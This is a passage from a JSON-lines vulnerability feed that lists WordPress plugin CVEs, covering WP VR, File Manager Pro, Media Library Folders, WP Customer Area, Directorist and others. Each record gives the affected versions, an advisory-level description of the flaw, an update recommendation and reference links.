version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/team-members\\\/style1.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/team-members\\\/style1.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/services\\\/content.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/services\\\/content.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6529","slug":"wpvr","versionImpact":"8.3.14","versionEndExcluding":"8.3.15","description":"The WP VR WordPress plugin before 8.3.15 does not authorisation and CSRF in a function hooked to admin_init, allowing unauthenticated users to downgrade the plugin, thus leading to Reflected or Stored XSS, as previous versions have such vulnerabilities.","recommendation":"Update to version 8.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c36314c1-a2c0-4816-93c9-e61f9cf7f27a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c36314c1-a2c0-4816-93c9-e61f9cf7f27a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8918","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to Limited JavaScript File Upload in all versions up to, and including, 8.3.9. This is due to a lack of proper checks on allowed file types. This makes it possible for unauthenticated attackers, with permissions granted by an administrator, to upload .css and .js files, which could lead to Stored Cross-Site Scripting.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ef62c8-e862-422c-948d-6d376d021c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ef62c8-e862-422c-948d-6d376d021c82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8746","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to arbitrary backup file downloads and uploads due to missing file type validation via the 'mk_file_folder_manager_shortcode' ajax action in all versions up to, and including, 8.3.9. This makes it possible for unauthenticated attackers, if granted access to the File Manager by an administrator, to download and upload arbitrary backup files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f1eb9a-f3bb-4b62-975f-a6cb95850966?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f1eb9a-f3bb-4b62-975f-a6cb95850966?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8507","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.3.9. This is due to missing or incorrect nonce validation on the 'mk_file_folder_manager' ajax action. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db70b37c-707a-47b8-a3a2-5a2b7d30de89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db70b37c-707a-47b8-a3a2-5a2b7d30de89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0935","slug":"media-library-plus","versionImpact":"8.3.0","versionEndExcluding":"8.3.1","description":"The Media Library Folders plugin for WordPress is vulnerable to unauthorized plugin settings change due to a missing capability check on several AJAX actions in all versions up to, and including, 8.3.0. This makes it possible for authenticated attackers, with Author-level access and above, to change plugin settings related to things such as IP-blocking.","recommendation":"Update to version 8.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L6296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L6296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L697\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L697\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L7198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L7198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234676\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234676\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f810102-cf25-4898-a3a6-3cdc9a96aaea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f810102-cf25-4898-a3a6-3cdc9a96aaea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1414","slug":"wpvr","versionEndExcluding":"8.3.0","description":"The WP VR WordPress plugin before 8.3.0 does not have authorisation and CSRF checks in various AJAX actions, one in particular could allow any authenticated users, such as subscriber to update arbitrary tours","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d61d4be7-9251-4c62-8fb7-8a456aa6969e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d61d4be7-9251-4c62-8fb7-8a456aa6969e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2224","slug":"directorist","versionImpact":"8.2","versionEndExcluding":"8.3","description":"The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized access  and modification of data due to a missing capability check on the 'parse_query' function in all versions up to, and including, 8.2. This makes it possible for unauthenticated attackers to update the post_status of any post to 'publish'.","recommendation":"Update to version 8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L912\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L912\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260639\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260639\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/684e6a97-b884-4d25-99f1-81c2a43f1239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/684e6a97-b884-4d25-99f1-81c2a43f1239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0566","slug":"smart-manager-for-wp-e-commerce","versionImpact":"8.27.0","versionEndExcluding":"8.28.0","description":"The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 8.28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca83db95-4a08-4615-aa8d-016022404c32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca83db95-4a08-4615-aa8d-016022404c32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1413","slug":"wpvr","versionEndExcluding":"8.2.9","description":"The WP VR WordPress plugin before 8.2.9 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6938fee5-3510-45e6-8112-c9e2b30f6881\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6938fee5-3510-45e6-8112-c9e2b30f6881\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0174","slug":"wpvr","versionEndExcluding":"8.2.7","description":"The WP VR WordPress plugin before 8.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b53d0e6-def9-4907-bd2b-884b2afa52b3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b53d0e6-def9-4907-bd2b-884b2afa52b3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25985","slug":"wordpress-tooltips","versionEndExcluding":"8.2.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in Tomas | Docs | FAQ | Premium Support WordPress Tooltips.This issue affects WordPress Tooltips: from n\/a through 8.2.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-tooltips\\\/wordpress-wordpress-tooltips-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-tooltips\\\/wordpress-wordpress-tooltips-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12436","slug":"customer-area","versionImpact":"8.2.4","versionEndExcluding":"8.2.5","description":"The WP Customer Area WordPress plugin through 8.2.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12280","slug":"customer-area","versionImpact":"8.2.4","versionEndExcluding":"8.2.5","description":"The WP Customer Area WordPress plugin through 8.2.4 does not have CSRF check in place when deleting its logs, which could allow attackers to make a logged in to delete them via a CSRF attack","recommendation":"Update to version 8.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b32c0b8-28bb-4220-800b-4c369bca91c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b32c0b8-28bb-4220-800b-4c369bca91c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7858","slug":"media-library-plus","versionImpact":"8.2.3","versionEndExcluding":"8.2.4","description":"The Media Library Folders plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several AJAX functions in the media-library-plus.php file in all versions up to, and including, 8.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions related to managing media files and folder along with controlling settings.","recommendation":"Update to version 8.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143036%40media-library-plus&new=3143036%40media-library-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143036%40media-library-plus&new=3143036%40media-library-plus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7857","slug":"media-library-plus","versionImpact":"8.2.2","versionEndExcluding":"8.2.3","description":"The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139954\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139954\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L1766\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L1766\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L3339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L3339\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0665","slug":"customer-area","versionImpact":"8.2.2","versionEndExcluding":"8.2.3","description":"The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 8.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025865\\\/customer-area\\\/trunk\\\/src\\\/php\\\/core-addons\\\/admin-area\\\/templates\\\/dashboard-page.template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025865\\\/customer-area\\\/trunk\\\/src\\\/php\\\/core-addons\\\/admin-area\\\/templates\\\/dashboard-page.template.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6824","slug":"customer-area","versionImpact":"8.2.0","versionEndExcluding":"8.2.1","description":"The WP Customer Area WordPress plugin before 8.2.1 does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user's account address.","recommendation":"Update to version 8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a224b984-770a-4534-b689-0701b582b388\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a224b984-770a-4534-b689-0701b582b388\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6741","slug":"customer-area","versionImpact":"8.2.0","versionEndExcluding":"8.2.1","description":"The WP Customer Area WordPress plugin before 8.2.1 does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.","recommendation":"Update to version 8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9debe1ea-18ad-44c4-8078-68eb66d36c4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9debe1ea-18ad-44c4-8078-68eb66d36c4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5464","slug":"jquery-accordion-slideshow","versionImpact":"8.1","versionEndExcluding":"8.2","description":"The Jquery accordion slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0531ca34-5d7b-4071-a1aa-934f14b87728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0531ca34-5d7b-4071-a1aa-934f14b87728?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985511\\\/jquery-accordion-slideshow#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985511\\\/jquery-accordion-slideshow#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-accordion-slideshow\\\/trunk\\\/jquery-accordion-slideshow.php?rev=2827053#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-accordion-slideshow\\\/trunk\\\/jquery-accordion-slideshow.php?rev=2827053#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1570","slug":"directorist","versionImpact":"8.1","versionEndExcluding":"8.2","description":"The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 8.1. This is due to the directorist_generate_password_reset_pin_code() and reset_user_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any users passwords, including an administrator.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246340\\\/directorist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246340\\\/directorist\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853562ed-7f2e-453c-b3d0-67c90bd0231f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853562ed-7f2e-453c-b3d0-67c90bd0231f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9225","slug":"wp-seopress","versionImpact":"8.1.1","versionEndExcluding":"8.2","description":"The SEOPress \u2013 On-site SEO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 8.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e648f65-3eeb-405d-b243-26354f3843c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e648f65-3eeb-405d-b243-26354f3843c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seopress\\\/tags\\\/8.1.1\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seopress\\\/tags\\\/8.1.1\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159928\\\/wp-seopress\\\/trunk\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159928\\\/wp-seopress\\\/trunk\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50893","slug":"impreza","versionEndExcluding":"8.18","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UpSolution Impreza \u2013 WordPress Website and WooCommerce Builder allows Reflected XSS.This issue affects Impreza \u2013 WordPress Website and WooCommerce Builder: from n\/a through 8.17.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/us-core\\\/wordpress-upsolution-core-plugin-8-17-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/us-core\\\/wordpress-upsolution-core-plugin-8-17-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0081","slug":"google-analytics-for-wordpress","versionEndExcluding":"8.12.1","description":"The MonsterInsights WordPress plugin before 8.12.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76d2963c-ebff-498f-9484-3c3008750c14\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76d2963c-ebff-498f-9484-3c3008750c14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8100","slug":"bdthemes-element-pack-lite","versionImpact":"8.1.5","versionEndExcluding":"8.1.6","description":"The Element Pack Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_content' parameter in versions up to, and including, 8.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-open-street-map.js#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-open-street-map.js#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/open-street-map\\\/widgets\\\/open-street-map.php#L498\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/open-street-map\\\/widgets\\\/open-street-map.php#L498\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3339093%40bdthemes-element-pack-lite&new=3339093%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3339093%40bdthemes-element-pack-lite&new=3339093%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f5d3585-19fe-4e85-87d0-7f4c62944146?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f5d3585-19fe-4e85-87d0-7f4c62944146?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4745","slug":"customer-area","versionEndExcluding":"8.1.4","description":"The WP Customer Area WordPress plugin before 8.1.4 does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9703f42e-bdfe-4787-92c9-47963d9af425\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9703f42e-bdfe-4787-92c9-47963d9af425\",\"refsource\":\"MISC\",\"tags\":[]}]"}
